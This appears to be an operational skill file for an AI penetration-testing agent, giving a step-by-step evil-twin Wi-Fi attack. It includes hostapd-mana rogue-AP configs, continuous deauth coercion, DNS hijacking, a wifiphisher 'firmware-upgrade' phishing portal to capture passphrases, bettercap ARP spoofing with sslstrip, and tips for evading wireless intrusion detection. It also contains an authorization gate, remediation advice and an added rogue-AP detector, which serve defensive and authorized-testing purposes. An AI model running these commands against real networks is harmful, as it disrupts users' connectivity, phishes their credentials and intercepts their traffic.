| name | evil-twin-karma |
| description | Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"wireless","when_to_use":"evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM","tags":["evil-twin","karma","mana","rogue-ap","captive-portal","mitm"],"mitre_attack":"T1557, T1556, T1598"} |
Evil Twin / KARMA / Mana Rogue AP
RoE hard stop (mirrors the wireless workflow loaded into your system prompt): NEVER bring up an evil-twin AP on public airspace without permitted_actions: evil_twin recorded in plan/roe.json for this session. Confirm iw reg get before any TX. This applies even on posture=loud — explicit operator approval is required.
Prerequisites
- TX-capable adapter (not just monitor mode).
- Tools: hostapd-mana, wifiphisher (portal templates), airgeddon (menu-driven alternative), dnsmasq, bettercap.
- Second adapter for deauth (optional but increases coercion speed).
- plan/roe.json must contain permitted_actions: evil_twin and valid regulatory TX authorization.
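A preflight gate for the RoE hard stop above, added here as example code (not part of the original skill). It assumes plan/roe.json stores permitted_actions as a JSON list of strings and that the regulatory check is run on the captured text of iw reg get; both are assumptions, not facts stated on the page.

```python
import json
import re
from typing import Optional, Tuple

# Added preflight gate for the RoE hard stop. Assumed (not stated on the page):
# plan/roe.json stores "permitted_actions" as a JSON list of strings, and the
# regulatory check is run on the captured text of `iw reg get`.

def evil_twin_permitted(roe_text: str) -> bool:
    """True only when plan/roe.json explicitly records permitted_actions: evil_twin."""
    try:
        roe = json.loads(roe_text)
    except json.JSONDecodeError:
        return False                  # unreadable RoE is treated as no permission
    if not isinstance(roe, dict):
        return False
    actions = roe.get("permitted_actions", [])
    if isinstance(actions, str):      # tolerate a single bare string value
        actions = [actions]
    return "evil_twin" in actions

def regdomain_country(iw_reg_output: str) -> Optional[str]:
    """Country code from `iw reg get`; None when the world domain '00' is in force."""
    m = re.search(r"^country (\w{2}):", iw_reg_output, re.M)
    if m is None or m.group(1) == "00":
        return None
    return m.group(1)

def tx_gate(roe_text: str, iw_reg_output: str) -> Tuple[bool, str]:
    """Both checks must pass before any AP is brought up; returns (ok, reason)."""
    if not evil_twin_permitted(roe_text):
        return False, "RoE: permitted_actions lacks evil_twin; hard stop"
    cc = regdomain_country(iw_reg_output)
    if cc is None:
        return False, "regdomain unset (country 00); hard stop before any TX"
    return True, f"evil_twin permitted, regdomain {cc}"

# Constructed sample inputs for a stand-alone run.
SAMPLE_ROE = '{"session": "demo", "permitted_actions": ["recon", "evil_twin"]}'
SAMPLE_IW_REG = "global\ncountry US: DFS-FCC\n\t(2402 - 2472 @ 40), (N/A, 30), (N/A)\n"
SAMPLE_IW_REG_UNSET = "global\ncountry 00: DFS-UNSET\n"

if __name__ == "__main__":
    print(tx_gate(SAMPLE_ROE, SAMPLE_IW_REG))
    print(tx_gate(SAMPLE_ROE, SAMPLE_IW_REG_UNSET))
```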
Step 1 — PNL / probe-request harvest
Preferred-Network List (PNL) probe requests reveal SSIDs a device will auto-associate to. Passive harvest before standing up the rogue AP:
```shell
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
sudo bettercap -iface <mon-iface> \
  -eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
```
Step 2 — Stand up rogue AP with hostapd-mana
Open-network variant (Mana answers only the SSIDs probed for in Step 1):
```shell
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
mana_enable=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF
sudo hostapd-mana /tmp/mana.conf
```
PSK variant (only when the passphrase is already known):
```shell
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
mana_enable=1
mana_credout=/tmp/mana_creds.txt
EOF
sudo hostapd-mana /tmp/evil_twin_psk.conf
```
Step 3 — Deauth-driven roaming coercion
```shell
# Targeted: a single client (preferred; see OPSEC notes)
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>
# Broadcast: all clients of the BSSID, continuous
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
```
Step 4 — DHCP + DNS for associated clients
```shell
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF
sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &
```
Step 5 — Captive portal credential capture (wifiphisher)
```shell
sudo wifiphisher \
  --essid "<TARGET_SSID>" \
  --channel <CHANNEL> \
  -p firmware-upgrade \
  --handshake-capture /tmp/wpa2_handshake.pcap
```
Post-association MITM for clients already on the rogue AP (bettercap):
```shell
sudo bettercap -iface <iface> \
  -eval "
set http.proxy.sslstrip true;
set net.sniff.verbose false;
net.probe on;
arp.spoof on;
http.proxy on;
net.sniff on
"
```
Step 6 — MAC-randomization defeat
Modern OSes (Android 10+, iOS 14+, Windows 10+) use randomized MAC addresses for probe requests, which complicates targeting:
```shell
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
  -T fields -e wlan.sa -e wlan_mgt.ssid -e wlan.seq 2>/dev/null \
  | sort -k1,1 -k3,3n > /tmp/probe_seqs.txt
```
Evidence
```python
kg_add_node(
    kind="credential",
    label=f"Captive portal PSK for {ssid}",
    props={
        "key": f"portal-cred::{bssid}::{client_mac}",
        "secret_type": "wpa_psk_phished",
        "ssid": ssid,
        "bssid": bssid,
        "client_mac": client_mac,
        "psk": psk,
        "portal_template": template_name,
        "captured_at": "<iso8601>",
        "source": "wifiphisher-portal",
    },
)
kg_add_node(
    kind="finding",
    label="Client PNL Probe Leakage — Evil-Twin Viable",
    props={
        "key": f"pnl-leak::{client_mac}",
        "severity": "high",
        "exposed_ssids": [<ssid_list>],
        "client_mac": client_mac,
        "remediation": (
            "Enable MAC randomization and disable 'auto-connect' for "
            "saved networks. Use WPA3 with Protected Management Frames "
            "to prevent deauth-driven roaming."
        ),
    },
)
```
ZFP
- airodump CSV showing client probe requests for target SSID.
- hostapd-mana log showing client association to rogue AP.
- wifiphisher output or bettercap log showing captured credential.
- (Optional) Pcap of the full association + DHCP + portal flow.
OPSEC notes
- Mana selective is quieter than KARMA universal — only probed SSIDs
get a response, reducing unexpected associations and WIDS alerts.
- Open AP (no PSK) has the fastest client association but exposes the
rogue AP to casual discovery.
- wifiphisher generates detectable management frames; WIDS tuned for
rogue APs will fire. Default posture: loud.
- Deauth coercion amplifies WIDS visibility; use single targeted deauth (--deauth 1) over broadcast where possible.
- Tear down the rogue AP immediately after credential capture to
minimize dwell and collateral client disruption.
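The WIDS side of the rogue-AP note above, as an added example that is not code from this skill or from any tool it lists: a minimal evil-twin rule over an airodump-ng CSV (the same artifact the ZFP list names), flagging any BSSID that beacons an ESSID the defender owns but is absent from an assumed per-ESSID allowlist, and listing clients already associated with it. The CSV content and the AUTHORIZED allowlist are constructed sample data.

```python
import csv
import io
from typing import Dict, List, Set

# Constructed sample in airodump-ng CSV layout: one legitimate CorpWiFi AP, one
# unauthorized BSSID beaconing the same ESSID as an open network, one station on it.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   8, CorpWiFi, 
DE:AD:BE:EF:00:01, 2024-05-01 10:02:00, 2024-05-01 10:05:00,  1,  54, OPN,  ,  , -35,  300,  0,   0.  0.  0.  0,   8, CorpWiFi, 
AA:BB:CC:00:00:09, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,   80,  0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
12:34:56:78:9A:BC, 2024-05-01 10:03:00, 2024-05-01 10:05:00, -50,  30, DE:AD:BE:EF:00:01, CorpWiFi
"""

# Assumed defender-maintained allowlist: authorized BSSIDs per ESSID (constructed).
AUTHORIZED: Dict[str, Set[str]] = {"CorpWiFi": {"AA:BB:CC:00:00:01"},
                                   "Guest": {"AA:BB:CC:00:00:09"}}

def _section(text: str, marker: str) -> str:
    """Slice one airodump section: the AP table ('BSSID,') or station table ('Station MAC,')."""
    start = text.index(marker)
    end = text.find("\n\n", start)          # sections are separated by a blank line
    return text[start:] if end < 0 else text[start:end]

def parse_rows(text: str, marker: str) -> List[Dict[str, str]]:
    """Rows of one section as dicts keyed by the stripped header names."""
    reader = csv.DictReader(io.StringIO(_section(text, marker)), skipinitialspace=True)
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k} for row in reader]

def evil_twin_findings(text: str, authorized: Dict[str, Set[str]]) -> List[Dict[str, str]]:
    """Flag every BSSID not on the allowlist that beacons an ESSID we own."""
    aps = parse_rows(text, "BSSID,")
    stations = parse_rows(text, "Station MAC,")
    findings = []
    for essid, allowed in authorized.items():
        rows = [a for a in aps if a["ESSID"] == essid]
        legit_privacy = {a["Privacy"] for a in rows if a["BSSID"] in allowed}
        for a in rows:
            if a["BSSID"] in allowed:
                continue
            reason = "unauthorized BSSID advertising authorized ESSID"
            if a["Privacy"] == "OPN" and "OPN" not in legit_privacy:
                reason += "; security downgrade to OPN"     # the open evil-twin pattern
            clients = sorted(s["Station MAC"] for s in stations if s["BSSID"] == a["BSSID"])
            findings.append({"essid": essid, "bssid": a["BSSID"], "channel": a["channel"],
                             "reason": reason, "associated_clients": ",".join(clients)})
    return findings
```

On the sample data the rule yields one finding: DE:AD:BE:EF:00:01 on channel 1, flagged for advertising CorpWiFi as an open network with one associated client.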
References
- hostapd-mana: github.com/sensepost/hostapd-mana
- wifiphisher: github.com/wifiphisher/wifiphisher
- airgeddon: github.com/v1s1t0r1sh3r3/airgeddon
- bettercap: bettercap.org
- wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.
- deauth-pmf skill — PMF detection and targeted deauth mechanics.
- wpa3-sae skill — Path D captive portal for SAE networks.